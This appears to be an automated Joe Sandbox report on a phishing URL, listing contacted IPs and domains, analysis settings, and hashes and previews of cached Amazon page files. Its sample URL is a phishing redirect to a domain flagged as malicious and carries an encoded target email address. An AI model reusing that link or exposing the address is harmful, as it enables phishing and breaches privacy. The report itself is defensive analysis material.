                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/01/AppFirst/ConsultAFriend/information-default.pngchromecache_552.2.dr, chromecache_289.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-hochromecache_362.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/S/sash/YAEPfuhs1l-argd.woff)chromecache_891.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        54.77.103.21
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        216.58.206.51
                                                                                                                                                                                                        ghs.googlehosted.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        151.101.1.16
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        52.95.115.255
                                                                                                                                                                                                        aax-eu.amazon-adsystem.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        67.220.228.202
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        18450WEBNXUSfalse
                                                                                                                                                                                                        81.17.55.172
                                                                                                                                                                                                        rtb-csync-euw1.smartadserver.comNetherlands
                                                                                                                                                                                                        24588NETPROVODOV-ASRUfalse
                                                                                                                                                                                                        34.160.236.64
                                                                                                                                                                                                        tagr-pixel-nginx-odr-euw4.mookie1.comUnited States
                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                        77.243.51.121
                                                                                                                                                                                                        uip.semasio.netDenmark
                                                                                                                                                                                                        42697NETIC-ASDKfalse
                                                                                                                                                                                                        18.239.83.45
                                                                                                                                                                                                        static.siege-amazon.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        3.72.129.255
                                                                                                                                                                                                        adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        52.214.73.191
                                                                                                                                                                                                        dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        151.101.129.16
                                                                                                                                                                                                        media.amazon.map.fastly.netUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        52.94.222.127
                                                                                                                                                                                                        aax-eu-retail-direct.amazon-adsystem.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                        a.nel.cloudflare.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        198.47.127.205
                                                                                                                                                                                                        pug-ams-bc.pubmnet.comUnited States
                                                                                                                                                                                                        62713AS-PUBMATICUSfalse
                                                                                                                                                                                                        54.239.35.235
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        3.164.163.31
                                                                                                                                                                                                        d2u28gf9o4d1cv.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        34.254.143.3
                                                                                                                                                                                                        load-euw1.exelator.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.165.191.159
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                        188.65.124.66
                                                                                                                                                                                                        public-prod-dspcookiematching.dmxleo.comFrance
                                                                                                                                                                                                        41690DAILYMOTIONForpeeringrelatedbusinesspleasemailpeerinfalse
                                                                                                                                                                                                        18.245.200.5
                                                                                                                                                                                                        d1nruqhae353qc.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.248.245.213
                                                                                                                                                                                                        eu-eb2.3lift.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        44.215.136.177
                                                                                                                                                                                                        unagi-na.amazon.comUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        185.89.210.244
                                                                                                                                                                                                        ib.anycast.adnxs.comGermany
                                                                                                                                                                                                        29990ASN-APPNEXUSfalse
                                                                                                                                                                                                        157.240.0.35
                                                                                                                                                                                                        star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                        67.220.226.172
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        18450WEBNXUSfalse
                                                                                                                                                                                                        35.214.128.5
                                                                                                                                                                                                        envoy-hl.envoy-csync1.core-b8mf.ov1o.comUnited States
                                                                                                                                                                                                        19527GOOGLE-2USfalse
                                                                                                                                                                                                        18.239.85.223
                                                                                                                                                                                                        c.media-amazon.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        162.219.224.163
                                                                                                                                                                                                        www-amazon-de.customer.fastly.netUnited States
                                                                                                                                                                                                        15108ALLO-COMMUSfalse
                                                                                                                                                                                                        18.196.77.193
                                                                                                                                                                                                        adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.18.36.155
                                                                                                                                                                                                        ssum-sec.casalemedia.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        3.253.166.191
                                                                                                                                                                                                        completion.amazon.co.ukUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        52.208.211.207
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                        34.247.233.198
                                                                                                                                                                                                        usersync.gumgum.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        142.250.186.100
                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        35.186.194.101
                                                                                                                                                                                                        sync.sxp.smartclip.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        52.208.235.132
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        54.36.150.184
                                                                                                                                                                                                        lb.mediarithmics.comFrance
                                                                                                                                                                                                        16276OVHFRfalse
                                                                                                                                                                                                        3.164.163.45
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        3.164.68.66
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        108.167.132.199
                                                                                                                                                                                                        foxloc.com.brUnited States
                                                                                                                                                                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                        52.209.66.123
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.197.94.79
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        34.251.192.12
                                                                                                                                                                                                        euw-ice.360yield.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        172.64.151.101
                                                                                                                                                                                                        dsum-sec.casalemedia.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        35.214.149.91
                                                                                                                                                                                                        user-data-eu.bidswitch.netUnited States
                                                                                                                                                                                                        19527GOOGLE-2USfalse
                                                                                                                                                                                                        35.244.159.8
                                                                                                                                                                                                        us-u.openx.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        151.101.65.16
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        87.248.119.251
                                                                                                                                                                                                        edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                        203220YAHOO-DEBDEfalse
                                                                                                                                                                                                        35.186.196.148
                                                                                                                                                                                                        sync.rfp.fout.jpUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        52.214.238.45
                                                                                                                                                                                                        sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.224.98.76
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        207.65.33.83
                                                                                                                                                                                                        pugm-sin12.pubmnet.comUnited States
                                                                                                                                                                                                        6203ISDN-NETUSfalse
                                                                                                                                                                                                        13.225.84.39
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        52.222.239.71
                                                                                                                                                                                                        djvbdz1obemzo.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        54.78.35.196
                                                                                                                                                                                                        endpoint.prod.eu-west-1.forester.a2z.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        52.95.122.73
                                                                                                                                                                                                        unagi-eu.amazon.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.32.118.131
                                                                                                                                                                                                        d2h8zr0m6mus4x.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        3.126.77.184
                                                                                                                                                                                                        crb.kargo.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        52.95.119.2
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        172.67.144.37
                                                                                                                                                                                                        eff.contempi.suUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        18.239.83.11
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        50.57.31.206
                                                                                                                                                                                                        uipus.semasio.netUnited States
                                                                                                                                                                                                        19994RACKSPACEUSfalse
                                                                                                                                                                                                        52.46.151.131
                                                                                                                                                                                                        s.amazon-adsystem.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        188.114.96.3
                                                                                                                                                                                                        ygbz.prosolmi.suEuropean Union
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        18.197.30.174
                                                                                                                                                                                                        match-eu-central-1-ecs.sharethrough.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        142.250.186.66
                                                                                                                                                                                                        cm.g.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        108.156.39.62
                                                                                                                                                                                                        dlsq0ztllwnya.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        35.190.24.218
                                                                                                                                                                                                        rd.frontend.weborama.frUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        217.182.178.234
                                                                                                                                                                                                        rtb-csync-euw2.smartadserver.comFrance
                                                                                                                                                                                                        16276OVHFRfalse
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                        Analysis ID:1493358
                                                                                                                                                                                                        Start date and time:2024-08-15 15:36:44 +02:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 4m 51s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                        Sample URL:https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:8
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal56.phis.win@26/1351@203/72
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Browse: https://www.amazon.ae/ref=nav_logo
                                                                                                                                                                                                        • Browse: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_lang
                                                                                                                                                                                                        • Browse: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0
                                                                                                                                                                                                        • Browse: https://www.amazon.ae/gp/css/order-history?ref_=nav_orders_first
                                                                                                                                                                                                        • Browse: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cart
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.186.99, 66.102.1.84, 142.250.186.46, 34.104.35.123, 2.20.142.88, 92.122.215.43, 95.101.54.106, 95.101.54.114, 2.16.202.121, 40.68.123.157, 199.232.214.172, 142.250.186.170, 142.250.186.74, 172.217.18.106, 142.250.185.106, 142.250.181.234, 142.250.185.202, 142.250.185.138, 172.217.18.10, 172.217.16.138, 142.250.186.138, 216.58.206.42, 172.217.16.202, 142.250.185.234, 216.58.206.74, 142.250.186.42, 142.250.185.74, 192.229.221.95, 52.165.164.15, 20.3.187.198, 37.157.4.29, 37.157.4.28, 37.157.5.87, 37.157.5.133, 37.157.5.84, 37.157.5.132, 72.246.169.24, 104.18.7.198, 104.18.6.198, 154.54.250.81, 154.57.158.115, 69.173.144.139, 69.173.144.165, 69.173.144.138, 142.250.186.131
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): tags.bluekai.com.edgekey.net, www.amazon.ae.edgekey.net, uipglob.trafficmanager.net, www.amazon.de.edgekey.net, lm.eyeblaster.akadns.net, pixel.rubiconproject.net.akadns.net, slscr.update.microsoft.com, clientservices.googleapis.com, track.adformnet.akadns.net, e9126.x.akamaiedge.net, clients2.google.com, a.media-amazon.com.akamaized.net, ocsp.digicert.com, lm-fr.eyeblaster.akadns.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ads.stickyadstv.com.edgesuite.net, sls.update.microsoft.com, update.googleapis.com, rtb-csync-geo.usersync-prod-sas.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, a1994.dscr.akamai.net, ip2.ads.stickyadstv.com.akadns.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, capi.connatix.com.cdn.cloudflare.net, e120914.dsca.akamaiedge.net, cidr1.ads.stickyadstv.com.akadns.net, fe3cr.delivery.
                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4058
                                                                                                                                                                                                        Entropy (8bit):7.670685813872088
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R90kUkg7u9q9VQxAsCHZou955WwkyEoH7+Mj7EE5TR:gLeq9Vg2DPqM8EL
                                                                                                                                                                                                        MD5:AD2F396F894FB5783BC9B0C129CF1E9D
                                                                                                                                                                                                        SHA1:2995D29D1633819C92370AAEBFC7099F86668B40
                                                                                                                                                                                                        SHA-256:74D21ED6150E08EDDA27FD3A4A09442A476F50F62A8050E82488DBCB172CB399
                                                                                                                                                                                                        SHA-512:CFA4CCDCDBE0C364828820F9B3D1C9C4C7D872E14E616CE595390EBA6556FB8333B2AA9840226045940EEEC1B99445DC3EFE7959EE31BD29FA983CDF55A67549
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:676F8B9C478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:676F8B9B478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="1D2D8B369F8CAF40DBD3A97E2A12B827" stRef:documentID="1D2D8B369F8CAF40DBD3A97E2A12B827"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d........................................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):263241
                                                                                                                                                                                                        Entropy (8bit):5.402576149145902
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:6wJFp+KkP0R9NLRqZSHoFvKZOyxXqv9KPXobdP2JwV5hI8MV4+4BZ2fTzdh1CXtj:6wJFp+KkP+LRqZSHoFvKZhxXqv9KPXo9
                                                                                                                                                                                                        MD5:BCEEC262E334DD84CFAEF57B305CCD6E
                                                                                                                                                                                                        SHA1:3A914AAC06ED5A0C95B1BF0A138EEC95795C64EC
                                                                                                                                                                                                        SHA-256:5CC6D8DE96138950861AF49D02E785F0F98F35C06E9166F6387C939FC1D0F7C3
                                                                                                                                                                                                        SHA-512:C2C5D2C070EEB8BA6572FCE266CAA194D0E6A4D52DB1C719E50F160AEA80A704D21062F8D142A4816F34518A49D8980B91296E3C337FFBDB778070C9D114BFA0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81F4LPKOIBL.js?AUIClients/FWCIMAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2895
                                                                                                                                                                                                        Entropy (8bit):7.826497439658205
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r68LkthuQUMH+NDmbKYqlBJr+Eu4rMG0ado3H4RJBQmP4oEe92FnwRzC8rfUM:T0QtJeFmbhqlBJSEu4rzdo3YRZ1J2Fn4
                                                                                                                                                                                                        MD5:92E47DFA821B169220B9BA6BAC240B3E
                                                                                                                                                                                                        SHA1:C069C4E126A698666FA89150595096CE2FF180E2
                                                                                                                                                                                                        SHA-256:BE975EF0DE3B1AB3CFC40F15C32A742F671F3F12E41A434C4753D2A845612CC1
                                                                                                                                                                                                        SHA-512:AD2511061C1E54572125AC6445FC9A97BA42F73EED2240DA3B8F3DEFEEEC53EE46D8456910FA8B1166F4E12E1416F47AC819A4FDA3655FB373BD4D7A9C7DA76C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1AQq..."2a..#..34R...Br....%bc..................................................!"1.Qq2............?..8..8......................................T... .j.*.`..u.L..~C&a<_..\3F.a.k..JY.V|+.....3*0.&y.'...s.7.o.\.........B.%....'y[..L6./u...KMu.iU..:*...3..GtNv..I;;.....@.X...Bl...(P...T..5G^...qT.9f....e.....;.Jo5{...6.].z...2...6...?..;.2<..v...zN.W.Z.Q.P...._...C...2z~y.5*.py.1.....n.................'..S=...Z"%...............=...."k.....qV.&.4.j..i..2......c..Z....wKt.)/3.]...G./6.WMUu..V..D.gr..x......}2f.{m...nr...eT...X.Y.A5f.......Z.9......)8.H*..:..)u...ys}w}V...F.Q.j...N.]..../.....}Z.V@...(..w5<.28...o&-..A.)SsY.D.j.....1'..e.$.N.JTP.|........>.c.f.y..-....zSD.l....B..od.]...s....*..H..gn.@u...).|u,.i...K....q..a.....Z..E
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                        Entropy (8bit):4.017824858003425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:kY4L4NKbvn:kY4EIn
                                                                                                                                                                                                        MD5:734930DCDBA2810CE73FE5069CC19669
                                                                                                                                                                                                        SHA1:81CAF1CBA98DBEAF1A9E7640B0B85071D099254C
                                                                                                                                                                                                        SHA-256:38956056E9E4D8C6798025989C602B9287F3B4477754CEBD04A48520E9490377
                                                                                                                                                                                                        SHA-512:DD2B4AF207BE550370A4B6E1780AF00C78BA68318F30C4DA5AF1F231B7E045DFF62CDDFD5FDA63C716A70CD6EEFE0C5C012262DA0AACD2E8E6718DECBB6C3A5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<UnknownOperationException/>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (850), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):850
                                                                                                                                                                                                        Entropy (8bit):4.741671106448604
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:yTXUpTXMjlTX1xTXEXjlTXEaTxTXiIATXiM8QBB8:YY8jNrsjN3yIiynQo
                                                                                                                                                                                                        MD5:62B73107BAE99C1A852746AFF9401FA5
                                                                                                                                                                                                        SHA1:FB3E4561309F2F3B85E2C00C445AA3C380FE331F
                                                                                                                                                                                                        SHA-256:753809D245BCA3093C3C55B0066C7974029A38FF5C1971D3B622497BAE6ACF60
                                                                                                                                                                                                        SHA-512:5AFCD4981D3A5F85D3546F628FFEF649E169E5710C38FC5609F40A52C34163882B127EE82F3DBF0CDAD5435D51673AA6893BD8EAAB9CA0724E6F9062245CC7EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01LNhrqAZmL.css?AUIClients/QuantitySliderAssets
                                                                                                                                                                                                        Preview:.qs-slider-button-group{width:112px}.qs-slider-atc-button{width:110px;margin-bottom:0!important;margin-top:0!important}.qs-slider-button-group>.qs-decrease-quantity{width:38px}.qs-slider-button-group>.qs-decrease-quantity .qs-decrease-quantity-text{pointer-events:none}.qs-slider-button-group>.qs-increase-quantity{width:38px}.qs-slider-button-group>.qs-increase-quantity .qs-increase-quantity-text{pointer-events:none}.qs-slider-button-group>.qs-qty-present-in-cart{width:36px;border-color:#adb1b8 #a2a6ac #8d9096!important}.qs-slider-button-group>.qs-qty-present-in-cart .qs-qty-present-in-cart-native{background-color:#fff}.qs-slider-spinner{position:absolute;top:0;right:0;bottom:0;left:0;margin:auto;pointer-events:none}.a-no-js .qs-slider-button{display:none}.a-no-js .qs-add-to-cart-button{display:block!important;visibility:visible!important}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):52976
                                                                                                                                                                                                        Entropy (8bit):5.315043781142496
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:/OwplOVh9aGPNItQPtazaikxMXXPB+YQycmcUOzheEfbTAYfnrIulbsksLZHU:Y9kXcmmzhe4vJrPsks6
                                                                                                                                                                                                        MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                                                        SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                                                        SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                                                        SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
